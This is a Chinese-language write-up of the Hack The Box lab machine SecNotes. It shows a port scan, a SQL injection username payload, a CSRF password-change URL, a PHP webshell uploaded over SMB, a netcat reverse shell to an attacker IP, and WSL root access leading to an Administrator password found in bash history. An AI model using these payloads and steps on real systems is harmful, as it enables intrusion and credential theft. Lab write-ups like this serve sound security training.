基本信息
data:image/s3,"s3://crabby-images/3c644/3c644316f662725c0a0e0ff84e17de881250d507" alt=""
端口扫描
80,445,8808:
1 | nmap -sT -p- --min-rate 10000 10.10.10.97 |
80
一个登录页面:
data:image/s3,"s3://crabby-images/7c36b/7c36bef4699e52b3850870434d594c96066ea1cd" alt=""
8808
IIS默认页面:
data:image/s3,"s3://crabby-images/4b942/4b942df875de0a4b488689ade077f1740df36b21" alt=""
Secure Notes
80端口随意注册登录:
data:image/s3,"s3://crabby-images/f9c24/f9c24026ceb7f2d68f6b19f293a77a8a868f543e" alt=""
可以得到管理员用户名和提示信息
二次注入
非预期,注册时用户名可以二次注入,如果用户名是' or 1='1
,登录后可以查看所有notes:
data:image/s3,"s3://crabby-images/0dc61/0dc6139f0b8db3f0d5f10b725c304f72eee97f9f" alt=""
New site里直接得到Tyler账号密码:
1 | \\secnotes.htb\new-site |
Contact csrf
Contact那里输入链接,会被直接访问:
data:image/s3,"s3://crabby-images/9f539/9f539ff04da82d8c251e18f90eb03d88c0a14016" alt=""
data:image/s3,"s3://crabby-images/a140a/a140a3b3dd184b47be3d21e7884122ed5d4e366c" alt=""
change password
修改密码默认是post,不校验原密码,但get形式也可以正常进行,那就是通过CSRF去修改管理员密码:
1 | http://10.10.10.97/change_pass.php?password=Aa123456&confirm_password=Aa123456&submit=submit |
data:image/s3,"s3://crabby-images/5ce32/5ce32a0b6938490a77749b6f31641166a372d45b" alt=""
data:image/s3,"s3://crabby-images/8f6f5/8f6f5eb7aa0a281671416601d4eb36fa2fde0b1d" alt=""
tyler
之后以tyler用户登录,得到账号密码:
data:image/s3,"s3://crabby-images/a4fd1/a4fd1931c6030fca488fd6601859a5079cc14a43" alt=""
SMB
直接smb查看可以看到newsite,就是8808端口那个:
data:image/s3,"s3://crabby-images/e0ad4/e0ad4fcce97289038f19f98f514d754fb4c5c65a" alt=""
webshell
参考80端口的php,直接smb传个php webshell到8808:
data:image/s3,"s3://crabby-images/07741/077413dff5df75d82f40d5b1586aa1293d89fff0" alt=""
reverse shell
直接smb传个nc上去反弹shell
1 | nc64.exe -e cmd.exe 10.10.14.12 4445 |
data:image/s3,"s3://crabby-images/5ef9b/5ef9b0839589494eb9487900c5ba01041c0584ca" alt=""
user flag
用户桌面目录得到user.txt:
data:image/s3,"s3://crabby-images/20b37/20b37bcf4d6dab10fb13a3d28536d7fee20bcf6d" alt=""
shell.sh
因为有自动清除机制,可以脚本自动操作:
1 |
|
WSL
从根目录开始可以发现Distros\Ubuntu,这是win10 WSL:
data:image/s3,"s3://crabby-images/40765/40765af92ef0261b9bf3ef66823849a33dc7a732" alt=""
bash.exe
查找bash直接运行,可以得到ubuntu root:
1 | where /R c:\ bash.exe |
data:image/s3,"s3://crabby-images/69c9b/69c9b9e0e6fdc9f693dbda1be51e1f8670656aa3" alt=""
.bash_history
这个bash_history里有历史信息,里面有Administrator密码:
看起来管理员正在尝试自己挂载本地文件系统,并且有管理员密码。甚至用户似乎都试图清除bash历史记录,但是由于当前会话是在退出时写入的,因此它仅清除该会话之前的历史记录。
1 | root@SECNOTES:~# cat .bash_history |
Filesystem
另一种方式是通过filesystem获取信息,bash文件系统位于AppData
文件夹rootfs
夹中:
1 | C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs> |
data:image/s3,"s3://crabby-images/f4248/f4248bb3c054010a5cd85c84d9ed65d374688140" alt=""
root flag
然后直接smb或者psexec,得到Administrator用户桌面得到root.txt:
data:image/s3,"s3://crabby-images/e3974/e39743c0df721c440e8dd0a74aaf34f3ff743021" alt=""
data:image/s3,"s3://crabby-images/bc737/bc73728e59ae0e26a3a26321266f4f6c4cf143ab" alt=""
参考资料
- HTB: SecNotes | 0xdf hacks stuff
https://0xdf.gitlab.io/2019/01/19/htb-secnotes.html#intended-route-xsrf - https://www.hackthebox.eu/home/machines/writeup/151
- HackTheBox - SecNotes - YouTube
https://www.youtube.com/watch?v=PJXb2pK8K84&feature=youtu.be&ab_channel=IppSec